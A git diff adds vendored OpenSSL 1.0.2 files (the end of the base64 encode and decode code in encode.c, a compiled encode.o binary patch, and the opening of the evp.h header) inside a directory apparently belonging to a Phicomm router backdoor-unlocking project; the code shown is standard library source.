+        i = ctx->length - ctx->num;
+        memcpy(&(ctx->enc_data[ctx->num]), in, i);
+        in += i;
+        inl -= i;
+        j = EVP_EncodeBlock(out, ctx->enc_data, ctx->length);
+        ctx->num = 0;
+        out += j;
+        *(out++) = '\n';
+        *out = '\0';
+        total = j + 1;
+    }
+    while (inl >= ctx->length) {
+        j = EVP_EncodeBlock(out, in, ctx->length);
+        in += ctx->length;
+        inl -= ctx->length;
+        out += j;
+        *(out++) = '\n';
+        *out = '\0';
+        total += j + 1;
+    }
+    if (inl != 0)
+        memcpy(&(ctx->enc_data[0]), in, inl);
+    ctx->num = inl;
+    *outl = total;
+}
+
+void EVP_EncodeFinal(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl)
+{
+    unsigned int ret = 0;
+
+    if (ctx->num != 0) {
+        ret = EVP_EncodeBlock(out, ctx->enc_data, ctx->num);
+        out[ret++] = '\n';
+        out[ret] = '\0';
+        ctx->num = 0;
+    }
+    *outl = ret;
+}
+
+int EVP_EncodeBlock(unsigned char *t, const unsigned char *f, int dlen)
+{
+    int i, ret = 0;
+    unsigned long l;
+
+    for (i = dlen; i > 0; i -= 3) {
+        if (i >= 3) {
+            l = (((unsigned long)f[0]) << 16L) |
+                (((unsigned long)f[1]) << 8L) | f[2];
+            *(t++) = conv_bin2ascii(l >> 18L);
+            *(t++) = conv_bin2ascii(l >> 12L);
+            *(t++) = conv_bin2ascii(l >> 6L);
+            *(t++) = conv_bin2ascii(l);
+        } else {
+            l = ((unsigned long)f[0]) << 16L;
+            if (i == 2)
+                l |= ((unsigned long)f[1] << 8L);
+
+            *(t++) = conv_bin2ascii(l >> 18L);
+            *(t++) = conv_bin2ascii(l >> 12L);
+            *(t++) = (i == 1) ? '=' : conv_bin2ascii(l >> 6L);
+            *(t++) = '=';
+        }
+        ret += 4;
+        f += 3;
+    }
+
+    *t = '\0';
+    return (ret);
+}
+
+void EVP_DecodeInit(EVP_ENCODE_CTX *ctx)
+{
+    ctx->length = 30;
+    ctx->num = 0;
+    ctx->line_num = 0;
+    ctx->expect_nl = 0;
+}
+
+/*-
+ * -1 for error
+ *  0 for last line
+ *  1 for full line
+ */
+int EVP_DecodeUpdate(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl,
+                     const unsigned char *in, int inl)
+{
+    int seof = -1, eof = 0, rv = -1, ret = 0, i, v, tmp, n, ln, exp_nl;
+    unsigned char *d;
+
+    n = ctx->num;
+    d = ctx->enc_data;
+    ln = ctx->line_num;
+    exp_nl = ctx->expect_nl;
+
+    /* last line of input. */
+    if ((inl == 0) || ((n == 0) && (conv_ascii2bin(in[0]) == B64_EOF))) {
+        rv = 0;
+        goto end;
+    }
+
+    /* We parse the input data */
+    for (i = 0; i < inl; i++) {
+        /* If the current line is > 80 characters, scream alot */
+        if (ln >= 80) {
+            rv = -1;
+            goto end;
+        }
+
+        /* Get char and put it into the buffer */
+        tmp = *(in++);
+        v = conv_ascii2bin(tmp);
+        /* only save the good data :-) */
+        if (!B64_NOT_BASE64(v)) {
+            OPENSSL_assert(n < (int)sizeof(ctx->enc_data));
+            d[n++] = tmp;
+            ln++;
+        } else if (v == B64_ERROR) {
+            rv = -1;
+            goto end;
+        }
+
+        /*
+         * have we seen a '=' which is 'definitly' the last input line.  seof
+         * will point to the character that holds it. and eof will hold how
+         * many characters to chop off.
+         */
+        if (tmp == '=') {
+            if (seof == -1)
+                seof = n;
+            eof++;
+        }
+
+        if (v == B64_CR) {
+            ln = 0;
+            if (exp_nl)
+                continue;
+        }
+
+        /* eoln */
+        if (v == B64_EOLN) {
+            ln = 0;
+            if (exp_nl) {
+                exp_nl = 0;
+                continue;
+            }
+        }
+        exp_nl = 0;
+
+        /*
+         * If we are at the end of input and it looks like a line, process
+         * it.
+         */
+        if (((i + 1) == inl) && (((n & 3) == 0) || eof)) {
+            v = B64_EOF;
+            /*
+             * In case things were given us in really small records (so two
+             * '=' were given in separate updates), eof may contain the
+             * incorrect number of ending bytes to skip, so let's redo the
+             * count
+             */
+            eof = 0;
+            if (d[n - 1] == '=')
+                eof++;
+            if (d[n - 2] == '=')
+                eof++;
+            /* There will never be more than two '=' */
+        }
+
+        if ((v == B64_EOF && (n & 3) == 0) || (n >= 64)) {
+            /*
+             * This is needed to work correctly on 64 byte input lines.  We
+             * process the line and then need to accept the '\n'
+             */
+            if ((v != B64_EOF) && (n >= 64))
+                exp_nl = 1;
+            if (n > 0) {
+                v = EVP_DecodeBlock(out, d, n);
+                n = 0;
+                if (v < 0) {
+                    rv = 0;
+                    goto end;
+                }
+                if (eof > v) {
+                    rv = -1;
+                    goto end;
+                }
+                ret += (v - eof);
+            } else {
+                eof = 1;
+                v = 0;
+            }
+
+            /*
+             * This is the case where we have had a short but valid input
+             * line
+             */
+            if ((v < ctx->length) && eof) {
+                rv = 0;
+                goto end;
+            } else
+                ctx->length = v;
+
+            if (seof >= 0) {
+                rv = 0;
+                goto end;
+            }
+            out += v;
+        }
+    }
+    rv = 1;
+ end:
+    *outl = ret;
+    ctx->num = n;
+    ctx->line_num = ln;
+    ctx->expect_nl = exp_nl;
+    return (rv);
+}
+
+int EVP_DecodeBlock(unsigned char *t, const unsigned char *f, int n)
+{
+    int i, ret = 0, a, b, c, d;
+    unsigned long l;
+
+    /* trim white space from the start of the line. */
+    while ((conv_ascii2bin(*f) == B64_WS) && (n > 0)) {
+        f++;
+        n--;
+    }
+
+    /*
+     * strip off stuff at the end of the line ascii2bin values B64_WS,
+     * B64_EOLN, B64_EOLN and B64_EOF
+     */
+    while ((n > 3) && (B64_NOT_BASE64(conv_ascii2bin(f[n - 1]))))
+        n--;
+
+    if (n % 4 != 0)
+        return (-1);
+
+    for (i = 0; i < n; i += 4) {
+        a = conv_ascii2bin(*(f++));
+        b = conv_ascii2bin(*(f++));
+        c = conv_ascii2bin(*(f++));
+        d = conv_ascii2bin(*(f++));
+        if ((a & 0x80) || (b & 0x80) || (c & 0x80) || (d & 0x80))
+            return (-1);
+        l = ((((unsigned long)a) << 18L) |
+             (((unsigned long)b) << 12L) |
+             (((unsigned long)c) << 6L) | (((unsigned long)d)));
+        *(t++) = (unsigned char)(l >> 16L) & 0xff;
+        *(t++) = (unsigned char)(l >> 8L) & 0xff;
+        *(t++) = (unsigned char)(l) & 0xff;
+        ret += 3;
+    }
+    return (ret);
+}
+
+int EVP_DecodeFinal(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl)
+{
+    int i;
+
+    *outl = 0;
+    if (ctx->num != 0) {
+        i = EVP_DecodeBlock(out, ctx->enc_data, ctx->num);
+        if (i < 0)
+            return (-1);
+        ctx->num = 0;
+        *outl = i;
+        return (1);
+    } else
+        return (1);
+}
+
+#ifdef undef
+int EVP_DecodeValid(unsigned char *buf, int len)
+{
+    int i, num = 0, bad = 0;
+
+    if (len == 0)
+        return (-1);
+    while (conv_ascii2bin(*buf) == B64_WS) {
+        buf++;
+        len--;
+        if (len == 0)
+            return (-1);
+    }
+
+    for (i = len; i >= 4; i -= 4) {
+        if ((conv_ascii2bin(buf[0]) >= 0x40) ||
+            (conv_ascii2bin(buf[1]) >= 0x40) ||
+            (conv_ascii2bin(buf[2]) >= 0x40) ||
+            (conv_ascii2bin(buf[3]) >= 0x40))
+            return (-1);
+        buf += 4;
+        num += 1 + (buf[2] != '=') + (buf[3] != '=');
+    }
+    if ((i == 1) && (conv_ascii2bin(buf[0]) == B64_EOLN))
+        return (num);
+    if ((i == 2) && (conv_ascii2bin(buf[0]) == B64_EOLN) &&
+        (conv_ascii2bin(buf[0]) == B64_EOLN))
+        return (num);
+    return (1);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/encode.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/encode.o
new file mode 100644
index 0000000000000000000000000000000000000000..11591c68b259f83e506449aba759e3dc9960eb58
GIT binary patch
literal 4784
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
W&+i}J$uIP$|6fu}N6Is{gZvk|WdKM3

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp.h
new file mode 100644
index 0000000..47abbac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp.h
@@ -0,0 +1,1519 @@
+/* crypto/evp/evp.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_ENVELOPE_H
+# define HEADER_ENVELOPE_H
+
+# ifdef OPENSSL_ALGORITHM_DEFINES
+#  include <openssl/opensslconf.h>
+# else
+#  define OPENSSL_ALGORITHM_DEFINES
+#  include <openssl/opensslconf.h>
+#  undef OPENSSL_ALGORITHM_DEFINES
+# endif
+
+# include <openssl/ossl_typ.h>
+
+# include <openssl/symhacks.h>
+
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+
+/*-
+#define EVP_RC2_KEY_SIZE                16
+#define EVP_RC4_KEY_SIZE                16
+#define EVP_BLOWFISH_KEY_SIZE           16
+#define EVP_CAST5_KEY_SIZE              16
+#define EVP_RC5_32_12_16_KEY_SIZE       16
+*/
+# define EVP_MAX_MD_SIZE                 64/* longest known is SHA512 */
+# define EVP_MAX_KEY_LENGTH              64
+# define EVP_MAX_IV_LENGTH               16
+# define EVP_MAX_BLOCK_LENGTH            32
+
+# define PKCS5_SALT_LEN                  8
+/* Default PKCS#5 iteration count */
+# define PKCS5_DEFAULT_ITER              2048
+
+# include <openssl/objects.h>
+
+# define EVP_PK_RSA      0x0001
+# define EVP_PK_DSA      0x0002
+# define EVP_PK_DH       0x0004
+# define EVP_PK_EC       0x0008
+# define EVP_PKT_SIGN    0x0010
+# define EVP_PKT_ENC     0x0020
+# define EVP_PKT_EXCH    0x0040
+# define EVP_PKS_RSA     0x0100
+# define EVP_PKS_DSA     0x0200
+# define EVP_PKS_EC      0x0400
+# define EVP_PKT_EXP     0x1000 /* <= 512 bit key */
+
+# define EVP_PKEY_NONE   NID_undef
+# define EVP_PKEY_RSA    NID_rsaEncryption
+# define EVP_PKEY_RSA2   NID_rsa
+# define EVP_PKEY_DSA    NID_dsa
+# define EVP_PKEY_DSA1   NID_dsa_2
+# define EVP_PKEY_DSA2   NID_dsaWithSHA
+# define EVP_PKEY_DSA3   NID_dsaWithSHA1
+# define EVP_PKEY_DSA4   NID_dsaWithSHA1_2
+# define EVP_PKEY_DH     NID_dhKeyAgreement
+# define EVP_PKEY_DHX    NID_dhpublicnumber
+# define EVP_PKEY_EC     NID_X9_62_id_ecPublicKey
+# define EVP_PKEY_HMAC   NID_hmac
+# define EVP_PKEY_CMAC   NID_cmac
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*
+ * Type needs to be a bit field Sub-type needs to be for variations on the
+ * method, as in, can it do arbitrary encryption....
+ */
+struct evp_pkey_st {
+    int type;
+    int save_type;
+    int references;
+    const EVP_PKEY_ASN1_METHOD *ameth;
+    ENGINE *engine;
+    union {
+        char *ptr;
+# ifndef OPENSSL_NO_RSA
+        struct rsa_st *rsa;     /* RSA */
+# endif
+# ifndef OPENSSL_NO_DSA
+        struct dsa_st *dsa;     /* DSA */
+# endif
+# ifndef OPENSSL_NO_DH
+        struct dh_st *dh;       /* DH */
+# endif
+# ifndef OPENSSL_NO_EC
+        struct ec_key_st *ec;   /* ECC */
+# endif
+    } pkey;
+    int save_parameters;
+    STACK_OF(X509_ATTRIBUTE) *attributes; /* [ 0 ] */
+} /* EVP_PKEY */ ;
+
+# define EVP_PKEY_MO_SIGN        0x0001
+# define EVP_PKEY_MO_VERIFY      0x0002
+# define EVP_PKEY_MO_ENCRYPT     0x0004
+# define EVP_PKEY_MO_DECRYPT     0x0008
+
+# ifndef EVP_MD
+struct env_md_st {
+    int type;
+    int pkey_type;
+    int md_size;
+    unsigned long flags;
+    int (*init) (EVP_MD_CTX *ctx);
+    int (*update) (EVP_MD_CTX *ctx, const void *data, size_t count);
+    int (*final) (EVP_MD_CTX *ctx, unsigned char *md);
+    int (*copy) (EVP_MD_CTX *to, const EVP_MD_CTX *from);
+    int (*cleanup) (EVP_MD_CTX *ctx);
+    /* FIXME: prototype these some day */
+    int (*sign) (int type, const unsigned char *m, unsigned int m_length,
+                 unsigned char *sigret, unsigned int *siglen, void *key);
+    int (*verify) (int type, const unsigned char *m, unsigned int m_length,
+                   const unsigned char *sigbuf, unsigned int siglen,
+                   void *key);
+    int required_pkey_type[5];  /* EVP_PKEY_xxx */
+    int block_size;
+    int ctx_size;               /* how big does the ctx->md_data need to be */
+    /* control function */
+    int (*md_ctrl) (EVP_MD_CTX *ctx, int cmd, int p1, void *p2);
+} /* EVP_MD */ ;
+
+typedef int evp_sign_method(int type, const unsigned char *m,
+                            unsigned int m_length, unsigned char *sigret,
+                            unsigned int *siglen, void *key);
+typedef int evp_verify_method(int type, const unsigned char *m,
+                              unsigned int m_length,
+                              const unsigned char *sigbuf,
+                              unsigned int siglen, void *key);
+
+/* digest can only handle a single block */
+#  define EVP_MD_FLAG_ONESHOT     0x0001
+
+/*
+ * digest is a "clone" digest used
+ * which is a copy of an existing
+ * one for a specific public key type.
+ * EVP_dss1() etc
+ */
+#  define EVP_MD_FLAG_PKEY_DIGEST 0x0002
+
+/* Digest uses EVP_PKEY_METHOD for signing instead of MD specific signing */
+
+#  define EVP_MD_FLAG_PKEY_METHOD_SIGNATURE       0x0004
+
+/* DigestAlgorithmIdentifier flags... */
+
+#  define EVP_MD_FLAG_DIGALGID_MASK               0x0018
+
+/* NULL or absent parameter accepted. Use NULL */
+
+#  define EVP_MD_FLAG_DIGALGID_NULL               0x0000
+
+/* NULL or absent parameter accepted. Use NULL for PKCS#1 otherwise absent */
+
+#  define EVP_MD_FLAG_DIGALGID_ABSENT             0x0008
+
+/* Custom handling via ctrl */
+
+#  define EVP_MD_FLAG_DIGALGID_CUSTOM             0x0018
+
+/* Note if suitable for use in FIPS mode */
+#  define EVP_MD_FLAG_FIPS        0x0400
+
+/* Digest ctrls */
+
+#  define EVP_MD_CTRL_DIGALGID                    0x1
+#  define EVP_MD_CTRL_MICALG                      0x2
+
+/* Minimum Algorithm specific ctrl value */
+
+#  define EVP_MD_CTRL_ALG_CTRL                    0x1000
+
+#  define EVP_PKEY_NULL_method    NULL,NULL,{0,0,0,0}
+
+#  ifndef OPENSSL_NO_DSA
+#   define EVP_PKEY_DSA_method     (evp_sign_method *)DSA_sign, \
+                                (evp_verify_method *)DSA_verify, \
+                                {EVP_PKEY_DSA,EVP_PKEY_DSA2,EVP_PKEY_DSA3, \
+                                        EVP_PKEY_DSA4,0}
+#  else
+#   define EVP_PKEY_DSA_method     EVP_PKEY_NULL_method
+#  endif
+
+#  ifndef OPENSSL_NO_ECDSA
+#   define EVP_PKEY_ECDSA_method   (evp_sign_method *)ECDSA_sign, \
+                                (evp_verify_method *)ECDSA_verify, \
+                                 {EVP_PKEY_EC,0,0,0}
+#  else
+#   define EVP_PKEY_ECDSA_method   EVP_PKEY_NULL_method
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+#   define EVP_PKEY_RSA_method     (evp_sign_method *)RSA_sign, \
+                                (evp_verify_method *)RSA_verify, \
+                                {EVP_PKEY_RSA,EVP_PKEY_RSA2,0,0}
+#   define EVP_PKEY_RSA_ASN1_OCTET_STRING_method \
+                                (evp_sign_method *)RSA_sign_ASN1_OCTET_STRING, \
+                                (evp_verify_method *)RSA_verify_ASN1_OCTET_STRING, \
+                                {EVP_PKEY_RSA,EVP_PKEY_RSA2,0,0}
+#  else
+#   define EVP_PKEY_RSA_method     EVP_PKEY_NULL_method
+#   define EVP_PKEY_RSA_ASN1_OCTET_STRING_method EVP_PKEY_NULL_method
+#  endif
+
+# endif                         /* !EVP_MD */
+
+struct env_md_ctx_st {
+    const EVP_MD *digest;
+    ENGINE *engine;             /* functional reference if 'digest' is
+                                 * ENGINE-provided */
+    unsigned long flags;
+    void *md_data;
+    /* Public key context for sign/verify */
+    EVP_PKEY_CTX *pctx;
+    /* Update function: usually copied from EVP_MD */
+    int (*update) (EVP_MD_CTX *ctx, const void *data, size_t count);
+} /* EVP_MD_CTX */ ;
+
+/* values for EVP_MD_CTX flags */
+
+# define EVP_MD_CTX_FLAG_ONESHOT         0x0001/* digest update will be
+                                                * called once only */
+# define EVP_MD_CTX_FLAG_CLEANED         0x0002/* context has already been
+                                                * cleaned */
+# define EVP_MD_CTX_FLAG_REUSE           0x0004/* Don't free up ctx->md_data
+                                                * in EVP_MD_CTX_cleanup */
+/*
+ * FIPS and pad options are ignored in 1.0.0, definitions are here so we
+ * don't accidentally reuse the values for other purposes.
+ */
+
+# define EVP_MD_CTX_FLAG_NON_FIPS_ALLOW  0x0008/* Allow use of non FIPS
+                                                * digest in FIPS mode */
+
+/*
+ * The following PAD options are also currently ignored in 1.0.0, digest
+ * parameters are handled through EVP_DigestSign*() and EVP_DigestVerify*()
+ * instead.
+ */
+# define EVP_MD_CTX_FLAG_PAD_MASK        0xF0/* RSA mode to use */
+# define EVP_MD_CTX_FLAG_PAD_PKCS1       0x00/* PKCS#1 v1.5 mode */
+# define EVP_MD_CTX_FLAG_PAD_X931        0x10/* X9.31 mode */
+# define EVP_MD_CTX_FLAG_PAD_PSS         0x20/* PSS mode */
+
+# define EVP_MD_CTX_FLAG_NO_INIT         0x0100/* Don't initialize md_data */
+
+struct evp_cipher_st {
+    int nid;
+    int block_size;
+    /* Default value for variable length ciphers */
+    int key_len;
+    int iv_len;
+    /* Various flags */
+    unsigned long flags;
+    /* init key */
+    int (*init) (EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                 const unsigned char *iv, int enc);
+    /* encrypt/decrypt data */
+    int (*do_cipher) (EVP_CIPHER_CTX *ctx, unsigned char *out,
+                      const unsigned char *in, size_t inl);
+    /* cleanup ctx */
+    int (*cleanup) (EVP_CIPHER_CTX *);
+    /* how big ctx->cipher_data needs to be */
+    int ctx_size;
+    /* Populate a ASN1_TYPE with parameters */
+    int (*set_asn1_parameters) (EVP_CIPHER_CTX *, ASN1_TYPE *);
+    /* Get parameters from a ASN1_TYPE */
+    int (*get_asn1_parameters) (EVP_CIPHER_CTX *, ASN1_TYPE *);
+    /* Miscellaneous operations */
+    int (*ctrl) (EVP_CIPHER_CTX *, int type, int arg, void *ptr);
+    /* Application data */
+    void *app_data;
+} /* EVP_CIPHER */ ;
+
+/* Values for cipher flags */
+
+/* Modes for ciphers */
+
+# define         EVP_CIPH_STREAM_CIPHER          0x0
+# define         EVP_CIPH_ECB_MODE               0x1
+# define         EVP_CIPH_CBC_MODE               0x2
+# define         EVP_CIPH_CFB_MODE               0x3
+# define         EVP_CIPH_OFB_MODE               0x4
+# define         EVP_CIPH_CTR_MODE               0x5
+# define         EVP_CIPH_GCM_MODE               0x6
+# define         EVP_CIPH_CCM_MODE               0x7
+# define         EVP_CIPH_XTS_MODE               0x10001
+# define         EVP_CIPH_WRAP_MODE              0x10002
+# define         EVP_CIPH_MODE                   0xF0007
+/* Set if variable length cipher */
+# define         EVP_CIPH_VARIABLE_LENGTH        0x8
+/* Set if the iv handling should be done by the cipher itself */
+# define         EVP_CIPH_CUSTOM_IV              0x10
+/* Set if the cipher's init() function should be called if key is NULL */
+# define         EVP_CIPH_ALWAYS_CALL_INIT       0x20
+/* Call ctrl() to init cipher parameters */
+# define         EVP_CIPH_CTRL_INIT              0x40
+/* Don't use standard key length function */
+# define         EVP_CIPH_CUSTOM_KEY_LENGTH      0x80
+/* Don't use standard block padding */
+# define         EVP_CIPH_NO_PADDING             0x100
+/* cipher handles random key generation */
+# define         EVP_CIPH_RAND_KEY               0x200
+/* cipher has its own additional copying logic */
+# define         EVP_CIPH_CUSTOM_COPY            0x400
+/* Allow use default ASN1 get/set iv */
+# define         EVP_CIPH_FLAG_DEFAULT_ASN1      0x1000
+/* Buffer length in bits not bytes: CFB1 mode only */
+# define         EVP_CIPH_FLAG_LENGTH_BITS       0x2000
+/* Note if suitable for use in FIPS mode */
+# define         EVP_CIPH_FLAG_FIPS              0x4000
+/* Allow non FIPS cipher in FIPS mode */
+# define         EVP_CIPH_FLAG_NON_FIPS_ALLOW    0x8000
+/*
+ * Cipher handles any and all padding logic as well as finalisation.
+ */
+# define         EVP_CIPH_FLAG_CUSTOM_CIPHER     0x100000
+# define         EVP_CIPH_FLAG_AEAD_CIPHER       0x200000
+# define         EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK 0x400000
+
+/*
+ * Cipher context flag to indicate we can handle wrap mode: if allowed in
+ * older applications it could overflow buffers.
+ */
+
